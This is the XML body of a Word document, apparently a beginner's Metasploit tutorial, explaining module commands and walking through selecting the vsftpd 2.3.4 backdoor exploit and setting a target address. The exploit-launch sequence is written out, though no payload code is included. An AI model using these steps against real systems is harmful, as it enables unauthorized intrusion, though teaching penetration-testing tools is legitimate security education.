          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Info - </w:t>
      </w:r>
      <w:r w:rsidR="000653C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidR="000653C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r w:rsidR="000653C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> command provides information regarding a module or platform, such as where it is used, who is the author, vulnerability reference, and its payload restriction.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C33BD8" w:rsidRPr="00645FA9" w:rsidRDefault="00C33BD8" w:rsidP="00C33BD8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="3390900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="Info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 Comma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rsidR="00AA0FF2" w:rsidRPr="00AA0FF2" w:rsidRDefault="00AA0FF2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0563C1" w:themeColor="hyperlink"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C2A4E" w:rsidRPr="00314416" w:rsidRDefault="00FF0EDF" w:rsidP="00FF0EDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Show payloads - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>To view all the available payloads in the Metasploit framework, use command show payloads to lists all the payloads in alphabetic order.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314416" w:rsidRPr="00C834BA" w:rsidRDefault="00314416" w:rsidP="00FF0EDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Show exploits - </w:t>
      </w:r>
      <w:r w:rsidR="000F0370">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>To view all the available exploits in the Metasploit framework, use the command </w:t>
      </w:r>
      <w:r w:rsidR="000F0370">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282A36"/>
        </w:rPr>
        <w:t>show exploits</w:t>
      </w:r>
      <w:r w:rsidR="000F0370">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> to list all the available </w:t>
      </w:r>
      <w:r w:rsidR="000F0370">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>exploits in alphabetic order with the date it was disclosed and the rank of the exploit ranging from excellent to average.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3401B" w:rsidRDefault="00F3401B" w:rsidP="00C834BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C834BA" w:rsidRPr="008C664E" w:rsidRDefault="00C834BA" w:rsidP="008C664E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C664E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The simplest way to understand what exploits and payloads are is to consider an exploit as how an attacker will deliver the payload, through the vulnerability hole in the target system. Once the exploit gets launched, it contains a payload against a vulnerable target, which then deployed in this stage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F759A" w:rsidRDefault="007F759A" w:rsidP="007F759A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>In this Metasploit tutorial, you will see how to find the desired module and target it with Metasploit. So in the Metasploit instance, write the search with the name of the exploit or a service/software which you have to target. So I am searching for the modules related to the FTP service like search with the service/software name:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F759A" w:rsidRDefault="007F759A" w:rsidP="007F759A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282A36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282A36"/>
        </w:rPr>
        <w:t>search ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3401B" w:rsidRDefault="00F3401B" w:rsidP="007F759A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007F759A" w:rsidRPr="00B20617" w:rsidRDefault="00B20617" w:rsidP="00B20617">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>As shown in the name of the exploit you can get the idea whether the exploit runs on the Windows or Linux as mentioned in the name, the disclosure date when the vulnerability was disclosed, rank is actually the probability of the success, check is to validate the existence of the vulnerability and the description contains the details regarding the software version or the situation in which the specific module will work.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C834BA" w:rsidRDefault="006909F4" w:rsidP="006909F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>After carefully reading and selecting the module, you can select that specific module by writing the use command along with the path of the module like below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00170A0A" w:rsidRDefault="00170A0A" w:rsidP="006909F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F8F8F2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282A36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F8F8F2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282A36"/>
        </w:rPr>
        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6B3F" w:rsidRDefault="005C6B3F" w:rsidP="006909F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F8F8F2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282A36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27BD3C2E" wp14:editId="21BA713A">
            <wp:extent cx="4181475" cy="447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447675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6B3F" w:rsidRDefault="005C6B3F" w:rsidP="006909F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Once you have selected the module, you have to make changes in its options to make it work on the target. You can view the options required by typing:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6B3F" w:rsidRDefault="005C6B3F" w:rsidP="006909F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F8F8F2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282A36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F8F8F2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282A36"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4BB4" w:rsidRDefault="00CD4BB4" w:rsidP="006909F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F8F8F2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282A36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD4BB4" w:rsidRDefault="00CD4BB4" w:rsidP="006909F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F8F8F2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282A36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14AA1908" wp14:editId="5A689777">
            <wp:extent cx="5731510" cy="2120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20900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6B3F" w:rsidRDefault="00CD4BB4" w:rsidP="006909F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>As can be seen in the above screenshot, this module requires only two options that are RHOSTS and RPORT, and the current value of these options can be seen in the current setting section, the required section is Boolean which shows yes if the value for that option is mandatory and no, if the value can be optional and the description which shows the details regarding the specific option. Later on, you can set the value of the option as required by typing the set along with option name like below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4BB4" w:rsidRDefault="00CD4BB4" w:rsidP="006909F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F8F8F2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282A36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-builtin"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F8F8F2"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F8F8F2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282A36"/>
        </w:rPr>
        <w:t xml:space="preserve"> RHOSTS 192.168.0.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4BB4" w:rsidRDefault="00CD4BB4" w:rsidP="006909F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53FB8201" wp14:editId="4F40D969">
            <wp:extent cx="5731510" cy="4044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495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4BB4" w:rsidRDefault="00CD4BB4" w:rsidP="00CD4BB4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Now for deselecting the specific module, you need to type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4BB4" w:rsidRDefault="00CD4BB4" w:rsidP="00CD4BB4">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282A36"/>
        </w:rPr>
        <w:t>back</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4BB4" w:rsidRDefault="00CD4BB4" w:rsidP="006909F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5344D281" wp14:editId="1B6497E6">
            <wp:extent cx="44577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700" cy="504825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4BB4" w:rsidRDefault="00CD4BB4" w:rsidP="00CD4BB4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>And to close the Metasploit instance, type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4BB4" w:rsidRDefault="00CD4BB4" w:rsidP="00CD4BB4">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-builtin"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282A36"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666B86" w:rsidRDefault="00666B86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00666B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B11130"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F6282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AF41008"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="701EA7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E072EBF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="406A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E47"/>
    <w:rsid w:val="000245F8"/>
    <w:rsid w:val="00026CDA"/>
    <w:rsid w:val="0004068D"/>
    <w:rsid w:val="000653C9"/>
    <w:rsid w:val="000E6E47"/>
    <w:rsid w:val="000F0370"/>
    <w:rsid w:val="000F5AB7"/>
    <w:rsid w:val="00117CCB"/>
    <w:rsid w:val="00143192"/>
    <w:rsid w:val="00162DFC"/>
    <w:rsid w:val="00165092"/>
    <w:rsid w:val="00170A0A"/>
    <w:rsid w:val="00170B57"/>
    <w:rsid w:val="001839BB"/>
    <w:rsid w:val="001D030A"/>
    <w:rsid w:val="001D48FC"/>
    <w:rsid w:val="001D52CE"/>
    <w:rsid w:val="001E13AF"/>
    <w:rsid w:val="001E6C88"/>
    <w:rsid w:val="002344F8"/>
    <w:rsid w:val="00272350"/>
    <w:rsid w:val="002A22D0"/>
    <w:rsid w:val="002A7E24"/>
    <w:rsid w:val="002B2F35"/>
    <w:rsid w:val="002C2A4E"/>
    <w:rsid w:val="002E1C77"/>
    <w:rsid w:val="002F47F7"/>
    <w:rsid w:val="00310EA6"/>
    <w:rsid w:val="00314416"/>
    <w:rsid w:val="00351935"/>
    <w:rsid w:val="00362F55"/>
    <w:rsid w:val="00387600"/>
    <w:rsid w:val="00394D49"/>
    <w:rsid w:val="003B68F8"/>
    <w:rsid w:val="003C3C88"/>
    <w:rsid w:val="003D6A49"/>
    <w:rsid w:val="004414B2"/>
    <w:rsid w:val="00456CD5"/>
    <w:rsid w:val="004907AE"/>
    <w:rsid w:val="004B3BA4"/>
    <w:rsid w:val="004B407A"/>
    <w:rsid w:val="004D345B"/>
    <w:rsid w:val="00504EE5"/>
    <w:rsid w:val="00512DA5"/>
    <w:rsid w:val="00525D7B"/>
    <w:rsid w:val="005A481D"/>
    <w:rsid w:val="005C6B3F"/>
    <w:rsid w:val="0060755A"/>
    <w:rsid w:val="00613C3E"/>
    <w:rsid w:val="006260DA"/>
    <w:rsid w:val="00645EEC"/>
    <w:rsid w:val="00645FA9"/>
    <w:rsid w:val="00666B86"/>
    <w:rsid w:val="0068446F"/>
    <w:rsid w:val="006909F4"/>
    <w:rsid w:val="00691EFB"/>
    <w:rsid w:val="00697061"/>
    <w:rsid w:val="006E63D4"/>
    <w:rsid w:val="00700777"/>
    <w:rsid w:val="00705763"/>
    <w:rsid w:val="007074B4"/>
    <w:rsid w:val="007115E8"/>
    <w:rsid w:val="00717194"/>
    <w:rsid w:val="007230DB"/>
    <w:rsid w:val="00723EF4"/>
    <w:rsid w:val="00740211"/>
    <w:rsid w:val="00771920"/>
    <w:rsid w:val="0077780F"/>
    <w:rsid w:val="00777A84"/>
    <w:rsid w:val="007847EE"/>
    <w:rsid w:val="007957FA"/>
    <w:rsid w:val="007A65DF"/>
    <w:rsid w:val="007B395D"/>
    <w:rsid w:val="007C79A1"/>
    <w:rsid w:val="007F759A"/>
    <w:rsid w:val="0082580B"/>
    <w:rsid w:val="008652B8"/>
    <w:rsid w:val="008867EE"/>
    <w:rsid w:val="008B0649"/>
    <w:rsid w:val="008C3255"/>
    <w:rsid w:val="008C664E"/>
    <w:rsid w:val="008D306E"/>
    <w:rsid w:val="00932CF8"/>
    <w:rsid w:val="00962593"/>
    <w:rsid w:val="009726D3"/>
    <w:rsid w:val="00986EE5"/>
    <w:rsid w:val="0099600B"/>
    <w:rsid w:val="0099744D"/>
    <w:rsid w:val="009B3015"/>
    <w:rsid w:val="009D63AC"/>
    <w:rsid w:val="009F2175"/>
    <w:rsid w:val="00A35686"/>
    <w:rsid w:val="00A35EB6"/>
    <w:rsid w:val="00A4687A"/>
    <w:rsid w:val="00A62D84"/>
    <w:rsid w:val="00A9625A"/>
    <w:rsid w:val="00A9794F"/>
    <w:rsid w:val="00AA0FF2"/>
    <w:rsid w:val="00AA4DA2"/>
    <w:rsid w:val="00AD79FA"/>
    <w:rsid w:val="00AE6563"/>
    <w:rsid w:val="00AE7F54"/>
    <w:rsid w:val="00B00FCF"/>
    <w:rsid w:val="00B064BB"/>
    <w:rsid w:val="00B147FC"/>
    <w:rsid w:val="00B15227"/>
    <w:rsid w:val="00B152AE"/>
    <w:rsid w:val="00B20617"/>
    <w:rsid w:val="00B216C7"/>
    <w:rsid w:val="00B32086"/>
    <w:rsid w:val="00B40517"/>
    <w:rsid w:val="00B918FA"/>
    <w:rsid w:val="00BA0C78"/>
    <w:rsid w:val="00BD0672"/>
    <w:rsid w:val="00BF282A"/>
    <w:rsid w:val="00C135E0"/>
    <w:rsid w:val="00C33BD8"/>
    <w:rsid w:val="00C56593"/>
    <w:rsid w:val="00C834BA"/>
    <w:rsid w:val="00CB2D0F"/>
    <w:rsid w:val="00CB63DD"/>
    <w:rsid w:val="00CC22A4"/>
    <w:rsid w:val="00CD4BB4"/>
    <w:rsid w:val="00CE10A4"/>
    <w:rsid w:val="00CE1B0C"/>
    <w:rsid w:val="00CE1ED1"/>
    <w:rsid w:val="00D03259"/>
    <w:rsid w:val="00D1129B"/>
    <w:rsid w:val="00D119BD"/>
    <w:rsid w:val="00D170A9"/>
    <w:rsid w:val="00D216E8"/>
    <w:rsid w:val="00D34560"/>
    <w:rsid w:val="00D50D98"/>
    <w:rsid w:val="00D51FA4"/>
    <w:rsid w:val="00D5580E"/>
    <w:rsid w:val="00DE0AB4"/>
    <w:rsid w:val="00E3624F"/>
    <w:rsid w:val="00E41315"/>
    <w:rsid w:val="00E56D4D"/>
    <w:rsid w:val="00E6187C"/>
    <w:rsid w:val="00E635F9"/>
    <w:rsid w:val="00E9357C"/>
    <w:rsid w:val="00EB6F36"/>
    <w:rsid w:val="00ED19AA"/>
    <w:rsid w:val="00ED224A"/>
    <w:rsid w:val="00ED5258"/>
    <w:rsid w:val="00EF4086"/>
    <w:rsid w:val="00EF5D46"/>
    <w:rsid w:val="00F00092"/>
    <w:rsid w:val="00F06E7A"/>
    <w:rsid w:val="00F22B81"/>
    <w:rsid w:val="00F3401B"/>
    <w:rsid w:val="00F4439D"/>
    <w:rsid w:val="00F44988"/>
    <w:rsid w:val="00F736FB"/>
    <w:rsid w:val="00F95100"/>
    <w:rsid w:val="00FB2120"/>
    <w:rsid w:val="00FC02A4"/>
    <w:rsid w:val="00FC1212"/>
    <w:rsid w:val="00FC6785"/>
    <w:rsid w:val="00FD13FE"/>
    <w:rsid w:val="00FD5C3D"/>
    <w:rsid w:val="00FE772A"/>
    <w:rsid w:val="00FE7E32"/>
    <w:rsid w:val="00FF0E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EA148F-326A-4CCD-9306-772292393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66B86"/>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2A4E"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
